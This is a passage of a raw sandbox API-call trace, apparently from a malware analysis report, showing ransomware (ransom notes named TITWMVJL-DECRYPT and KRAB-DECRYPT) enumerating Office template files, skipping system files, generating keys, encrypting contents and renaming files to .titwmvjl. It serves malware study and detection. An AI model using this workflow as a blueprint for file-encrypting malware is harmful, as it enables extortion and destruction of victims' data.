(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\TITWMVJL-DECRYPT.txt") returned 90 [0079.173] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.173] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.173] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.173] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.173] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.173] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.173] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.173] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.173] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.173] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0079.174] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0079.174] CloseHandle (hObject=0x2c4) returned 1 [0079.174] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.174] lstrcmpW (lpString1="Normal.dotm", lpString2=".") returned 1 [0079.175] lstrcmpW (lpString1="Normal.dotm", lpString2="..") returned 1 [0079.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Normal.dotm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" [0079.175] lstrlenW (lpString=".titwmvjl") returned 9 [0079.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 69 [0079.175] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.175] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.titwmvjl") returned 78 [0079.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 69 [0079.175] lstrlenW (lpString=".dotm") returned 5 [0079.175] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.175] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".dotm ") returned 6 [0079.175] lstrcmpiW (lpString1=".dotm", lpString2=".titwmvjl") returned -1 [0079.175] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 69 [0079.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 69 [0079.175] lstrcmpiW (lpString1="Normal.dotm", lpString2="desktop.ini") returned 1 [0079.175] lstrcmpiW (lpString1="Normal.dotm", lpString2="autorun.inf") returned 1 [0079.175] lstrcmpiW (lpString1="Normal.dotm", lpString2="ntuser.dat") returned -1 [0079.175] lstrcmpiW (lpString1="Normal.dotm", lpString2="iconcache.db") returned 1 [0079.175] lstrcmpiW (lpString1="Normal.dotm", lpString2="bootsect.bak") returned 1 [0079.175] lstrcmpiW (lpString1="Normal.dotm", lpString2="boot.ini") returned 1 [0079.175] lstrcmpiW (lpString1="Normal.dotm", lpString2="ntuser.dat.log") returned -1 [0079.175] lstrcmpiW (lpString1="Normal.dotm", lpString2="thumbs.db") returned -1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="KRAB-DECRYPT.html") returned 1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="CRAB-DECRYPT.html") returned 1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="KRAB-DECRYPT.txt") returned 1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="ntldr") returned -1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="NTDETECT.COM") returned -1 [0079.176] lstrcmpiW (lpString1="Normal.dotm", lpString2="Bootfont.bin") returned 1 [0079.176] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 69 [0079.176] lstrlenW (lpString=".dotm") returned 5 [0079.176] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.176] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".dotm ") returned 6 [0079.176] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.176] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.176] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0079.177] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.177] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0079.191] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.191] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.194] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.194] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.194] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.194] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0079.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.194] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.194] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.195] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.198] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.198] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.198] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.198] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0079.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.198] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.198] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.199] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.203] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5033b8) returned 1 [0079.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.203] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.204] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.204] GetLastError () returned 0x0 [0079.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.204] CryptDestroyKey (hKey=0x5033b8) returned 1 [0079.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.204] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.205] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.209] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503638) returned 1 [0079.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.209] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.209] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.209] GetLastError () returned 0x0 [0079.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.210] CryptDestroyKey (hKey=0x503638) returned 1 [0079.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.210] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.210] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.210] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.210] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x49a5, lpOverlapped=0x0) returned 1 [0079.227] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffb65b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.227] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x49a5, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x49a5, lpOverlapped=0x0) returned 1 [0079.233] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0079.234] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.240] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.240] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.240] CloseHandle (hObject=0x2c4) returned 1 [0079.242] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\normal.dotm.titwmvjl"), dwFlags=0x1) returned 1 [0079.243] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.243] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.243] lstrcmpW (lpString1="Process Map for Basic Flowchart.xltx", lpString2=".") returned 1 [0079.243] lstrcmpW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="..") returned 1 [0079.243] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Process Map for Basic Flowchart.xltx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx" [0079.243] lstrlenW (lpString=".titwmvjl") returned 9 [0079.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned 94 [0079.243] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.243] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx.titwmvjl") returned 103 [0079.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned 94 [0079.244] lstrlenW (lpString=".xltx") returned 5 [0079.244] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.244] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xltx ") returned 6 [0079.244] lstrcmpiW (lpString1=".xltx", lpString2=".titwmvjl") returned 1 [0079.244] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned 94 [0079.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned 94 [0079.244] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="desktop.ini") returned 1 [0079.244] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="autorun.inf") returned 1 [0079.244] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="ntuser.dat") returned 1 [0079.244] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="iconcache.db") returned 1 [0079.244] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="bootsect.bak") returned 1 [0079.244] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="boot.ini") returned 1 [0079.244] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="ntuser.dat.log") returned 1 [0079.244] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="thumbs.db") returned -1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="KRAB-DECRYPT.html") returned 1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="CRAB-DECRYPT.html") returned 1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="KRAB-DECRYPT.txt") returned 1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="ntldr") returned 1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="NTDETECT.COM") returned 1 [0079.245] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="Bootfont.bin") returned 1 [0079.245] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned 94 [0079.245] lstrlenW (lpString=".xltx") returned 5 [0079.245] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.245] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xltx ") returned 6 [0079.245] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.245] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.246] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for basic flowchart.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0079.246] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.246] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0079.248] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.249] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.252] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.253] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.253] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.253] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0079.253] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.253] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.253] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.253] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.253] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.258] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.258] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.258] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.258] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0079.258] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.258] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.258] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.259] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.259] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.263] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.263] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503938) returned 1 [0079.263] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.263] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.263] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.263] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.264] GetLastError () returned 0x0 [0079.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.264] CryptDestroyKey (hKey=0x503938) returned 1 [0079.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.264] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.264] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.268] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503578) returned 1 [0079.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.268] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.269] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.269] GetLastError () returned 0x0 [0079.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.269] CryptDestroyKey (hKey=0x503578) returned 1 [0079.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.269] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.269] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.270] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.270] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x1ad7d, lpOverlapped=0x0) returned 1 [0079.294] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffe5283, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.295] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1ad7d, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x1ad7d, lpOverlapped=0x0) returned 1 [0079.296] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0079.297] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.301] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.302] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.303] CloseHandle (hObject=0x2c4) returned 1 [0079.305] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for basic flowchart.xltx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for basic flowchart.xltx.titwmvjl"), dwFlags=0x1) returned 1 [0079.306] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.306] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.306] lstrcmpW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2=".") returned 1 [0079.306] lstrcmpW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="..") returned 1 [0079.306] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Process Map for Cross-Functional Flowchart.xltx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx" [0079.306] lstrlenW (lpString=".titwmvjl") returned 9 [0079.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned 105 [0079.306] VirtualAlloc (lpAddress=0x0, dwSize=0x112, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.307] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: 